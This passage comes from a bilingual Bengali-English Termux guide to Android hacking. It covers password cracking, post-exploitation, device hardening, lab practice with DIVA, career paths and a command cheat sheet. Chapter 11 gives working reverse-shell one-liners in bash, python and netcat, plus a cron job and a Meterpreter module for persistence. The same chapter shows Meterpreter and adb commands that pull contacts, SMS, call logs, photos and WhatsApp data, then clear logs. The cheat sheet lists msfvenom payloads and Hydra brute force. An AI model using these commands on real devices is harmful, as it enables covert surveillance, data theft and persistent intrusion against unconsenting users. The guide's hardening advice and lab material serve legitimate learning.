# Hash type identify করো hash-identifier "5f4dcc3b5aa765d61d8327deb882cf99" # john the ripper pkg install john john --wordlist=rockyou.txt hashes.txt # Dictionary attack john --format=md5 --wordlist=rockyou.txt hash.txt john --show hashes.txt # Cracked passwords দেখো # hashcat (GPU — Desktop-এ বেশি কাজের) hashcat -m 0 hash.txt rockyou.txt # MD5 hashcat -m 1000 hash.txt rockyou.txt # NTLM (Windows) hashcat -m 1800 hash.txt rockyou.txt # SHA-512 (Linux) hashcat -m 3200 hash.txt rockyou.txt # bcrypt hashcat -m 22000 hash.hc22000 rockyou.txt # WPA2 # Hash Type Reference: MD5 = -m 0 → 5f4dcc3b5aa765d61d8327deb882cf99 SHA1 = -m 100 → 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8 SHA256 = -m 1400 bcrypt = -m 3200 → $2y$10$...

🔑 Chapter সারসংক্ষেপChapter Summary

📚 cupp দিয়ে target-এর info থেকে custom wordlistCreate custom wordlists from target info using cupp
💥 Hydra = SSH, FTP, HTTP সব service-এ brute forceHydra = brute force SSH, FTP, HTTP and all services
🔓 hashcat + rockyou = MD5 password 5 মিনিটে crackhashcat + rockyou = crack MD5 passwords in 5 minutes

Chapter 11

🎭 Post Exploitation — Access পাওয়ার পরেAfter Getting Access

System-এ ঢোকার পরে কী করে Privilege বাড়ানো যায়, কীভাবে Persistence রাখা যায়After entering a system — how to escalate privileges and maintain persistence

⬆️ Privilege Escalation — Android

# System info gather করো adb shell getprop ro.build.version.release # Android version adb shell getprop ro.build.fingerprint # Build info adb shell cat /proc/version # Kernel version # CVE check — known kernel exploits # Android 9 = Kernel 4.x → search for privilege escalation CVEs # SUID binaries খোঁজো adb shell find / -perm -4000 2>/dev/null # Writable directories adb shell find / -writable -type d 2>/dev/null | head -20 # Running services adb shell ps -A | grep -v "kthre\|kwork"

🔁 Persistence — Access ধরে রাখাMaintaining Access

# Meterpreter persistence module meterpreter > run persistence -A -S -U -X -i 30 -p 4444 -r 192.168.1.X # -A = autostart msfconsole # -S = run as service # -X = start on boot # -i = interval (seconds) # Cronjob persistence (Linux server) crontab -e # Add: */5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.X/4444 0>&1' # Reverse Shell one-liners # Bash bash -i >& /dev/tcp/192.168.1.X/4444 0>&1 # Python python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("192.168.1.X",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")' # Netcat nc -e /bin/bash 192.168.1.X 4444

📦 Data Exfiltration

# Meterpreter — Data collection meterpreter > run post/multi/recon/local_exploit_suggester meterpreter > run post/android/gather/contacts meterpreter > run post/android/gather/call_logs meterpreter > run post/android/gather/sms meterpreter > run post/android/gather/get_user_files # ADB-এ সব photos নিয়ে আসো adb pull /sdcard/DCIM/ ./photos/ adb pull /sdcard/WhatsApp/ ./whatsapp_backup/ # Tracks মুছে ফেলো meterpreter > clearev # Event logs clear adb shell logcat -c # System logs clear

🎭 Chapter সারসংক্ষেপChapter Summary

⬆️ Privilege Escalation = System-এ আরও বেশি ControlPrivilege Escalation = more control over the system
🔁 Persistence = Device restart-এর পরেও Connection রাখাPersistence = maintain connection after device restart
🧹 Tracks মুছে ফেলা Professional Pentest-এর অংশClearing tracks is part of professional pentesting

Chapter 12

🛡️ Android Security HardeningAndroid Security Hardening

নিজের Android Device ও Termux-কে Secure করার সম্পূর্ণ গাইডComplete guide to securing your Android device and Termux

📱 Android Device HardeningAndroid Device Hardening

✅ করোDo This

💡 OS সবসময় আপডেট রাখোAlways keep OS updated
🔐 Strong PIN/Password (6+ digit)Strong PIN/Password (6+ digit)
🔒 Full Disk Encryption চালু করোEnable Full Disk Encryption
📲 Only Play Store থেকে App installInstall apps only from Play Store
🌐 VPN ব্যবহার করো (Public WiFi-তে)Use VPN (on public WiFi)
🔑 2FA সব Account-এ চালু করোEnable 2FA on all accounts
🧹 Unused Apps মুছে ফেলোDelete unused apps

❌ করো নাDon't Do This

Unknown APK install করাInstall unknown APKs
Public WiFi-তে Banking করাDo banking on public WiFi
SMS-এ আসা link-এ click করাClick links in SMS
Unnecessary permissions দেওয়া
USB Debugging চালু রাখা
Developer Options খোলা রাখা
Root করলে SELinux বন্ধ করাTurning off SELinux after rooting

🔒 Termux Security

# SSH key তৈরি করো (Password-এর বদলে) ssh-keygen -t ed25519 -C "termux@android" cat ~/.ssh/id_ed25519.pub # Termux SSH Server চালু করো (Password-less) pkg install openssh sshd # SSH server start # Port: 8022 (না 22) # File Encryption pkg install gnupg gpg --symmetric secret_file.txt # Encrypt gpg --decrypt secret_file.txt.gpg # Decrypt # Network Monitoring — কে কথা বলছে? netstat -an | grep ESTABLISHED ss -tp # Firewall rules (root required) iptables -L # Current rules iptables -A INPUT -p tcp --dport 8022 -j ACCEPT # Allow SSH iptables -A INPUT -j DROP # Block rest

🛡️ Chapter সারসংক্ষেপChapter Summary

🔒 Encryption + 2FA + Strong Password = Basic SecurityEncryption + 2FA + Strong Password = Basic Security
📲 Unknown APK install করো না — সবচেয়ে বড় RiskDon't install unknown APKs — biggest risk
🌐 Public WiFi-তে VPN ছাড়া কাজ করো নাNever work on public WiFi without VPN

Chapter 13

🏆 CTF Practice ও Lab Setup

Vulnerable Apps দিয়ে Safe Practice — Android Security Testing LabSafe practice with vulnerable apps — Android security testing lab

📱 Vulnerable Android Apps — Practice TargetVulnerable Android Apps — Practice Targets

App	কী শেখা যায়What You Learn	Download	Level
DIVA	Android vuln সব ধরনAll types of Android vulns	GitHub	Beginner
InsecureBankv2	Banking app vulnerabilitiesBanking app vulnerabilities	GitHub	Medium
AndroGoat	OWASP Mobile Top 10	GitHub	Medium
MSTG Crackmes	Reverse EngineeringReverse Engineering	GitHub	Hard
HackTheBox Android	Real CTF challenges	htb.com	Hard

🧪 DIVA — সবার আগে এটা দিয়ে শুরু করোStart Here First

# DIVA (Damn Insecure and Vulnerable App) download wget https://github.com/0xArab/diva-apk-file/raw/master/DivaApplication.apk # নিজের Phone-এ install করো adb install DivaApplication.apk # DIVA-র 13টি Challenge: 01. Insecure Logging 02. Hardcoded Issues 03. Insecure Data Storage (SharedPreferences) 04. Insecure Data Storage (SQLite) 05. Insecure Data Storage (Temp Files) 06. Insecure Data Storage (External Storage) 07. Input Validation Issues (SQLi) 08. Input Validation Issues (XSS) 09. Access Control Issues 10. Insecure Data Storage (3rd Party Libs) 11. Input Validation Issues (BufferOverflow) 12. Hardcoded Issues (Part 2) 13. Input Validation Issues (SQL Injection — Part 2) # Challenge 3 — SharedPreferences solve করা: adb shell cat /data/data/jakhar.aseem.diva/shared_prefs/*.xml

🌐 Online Practice Platforms

HackTheBox

Android CTF machines
APK challenges
Real-world scenarios
Free tier available

TryHackMe

Guided Android rooms
Step-by-step learning
Beginner friendly
Free + Premium

PortSwigger

Mobile web testing
API testing
100% Free
Best for beginners

🏆 Chapter সারসংক্ষেপChapter Summary

📱 DIVA দিয়ে শুরু করো — 13টি Challenge, সব কিছু আছেStart with DIVA — 13 challenges covering everything
🏆 HackTheBox = Real-world Android Hacking PracticeHackTheBox = real-world Android hacking practice
🌐 TryHackMe = Guided Learning, Beginner-দের জন্য সেরাTryHackMe = guided learning, best for beginners

Chapter 14

📚 Career Path, Resources ও Cheat Sheet

সম্পূর্ণ Termux Cheat Sheet, Career Guide এবং সেরা ResourcesComplete Termux Cheat Sheet, Career Guide, and best resources

🗺️ Career Path — Android Security

Month 1–2: Foundation

Termux setup, ADB, Android Architecture, DIVA practiceTermux setup, ADB, Android architecture, DIVA practice

Termux ADB DIVA

⬇

Month 3–4: Tools

Metasploit, APK Analysis, Network Attacks, HydraMetasploit, APK Analysis, Network Attacks, Hydra

Metasploit apktool MITM

⬇

Month 5–6: CTF

HackTheBox, TryHackMe Android challengesHackTheBox, TryHackMe Android challenges

HackTheBox TryHackMe CTF

⬇

Month 7+: Bug Bounty

HackerOne/Bugcrowd-এ Android App Bug Bounty শুরু করোStart Android App Bug Bounty on HackerOne/Bugcrowd

Bug Bounty Android Pentest 💰 Earning

📋 সম্পূর্ণ Termux Cheat SheetComplete Termux Cheat Sheet

📦 Termux Basics

pkg update && pkg upgrade

System update

pkg install [tool]

Tool install

termux-setup-storage

Storage access

proot-distro login kali

Enter Kali Linux

termux-wake-lock

Keep screen alive

🗺️ Network Recon

nmap -sn 192.168.1.0/24

Host discovery

nmap -sV -sC [IP]

Service scan

netdiscover -r [range]

ARP scan

tcpdump -i wlan0 -w cap.pcap

Packet capture

whois [domain]

Domain info

📲 APK Analysis

apktool d app.apk -o out/

Decompile APK

jadx -d out/ app.apk

Java decompile

apktool b out/ -o new.apk

Recompile APK

grep -ri "api_key" out/

Find secrets

adb install app.apk

Install APK

💣 Exploitation

msfvenom -p android/... LHOST=X LPORT=4444 -o a.apk

Android payload

msfconsole -q

Start Metasploit

use exploit/multi/handler

Start listener

sessions -l

List sessions

sessions -i 1

Enter session

🔑 Password Attack

hydra -l admin -P rockyou.txt ssh://[IP]

SSH brute

hashcat -m 0 hash.txt wordlist.txt

MD5 crack

john --wordlist=list.txt hash.txt

John crack

cupp -i

Custom wordlist

crunch 8 8 0-9 -o nums.txt

Generate wordlist

🕵️ OSINT

python3 sherlock [username]

Username search

holehe [email]

Email OSINT

phoneinfoga scan -n "+880..."

Phone OSINT

theHarvester -d target.com -b all

Domain harvest

shodan host [IP]

Shodan lookup

📚 সেরা ResourcesBest Resources

🆓 Free

OWASP Mobile Testing Guide
PortSwigger Web Academy
TryHackMe (free tier)
HackTheBox (free)
YouTube: NetworkChuck
NullByte.WonderHowTo.com

📖 Books

Android Security Internals
The Mobile Application Hacker's Handbook
Android Hacker's Handbook
Hacking APIs — Corey J Ball

🏅 Certifications

eMAPT (eLearnSecurity)
GMOB (GIAC)
CEH (EC-Council)
OSCP (Offensive Security)

📱 "Security is not a product, but a process — and Termux is your laboratory."

এই গাইড সম্পূর্ণ শিক্ষামূলক। সবসময় নিজের Device বা authorized Lab-এ Practice করো। This guide is entirely educational. Always practice on your own device or in an authorized lab.

Android Hacking (Termux-based) — সম্পূর্ণ বাংলা গাইডComplete Bilingual Guide

14 Chapters • Bilingual • Dark Mode • Full Cheat Sheet • Career Guide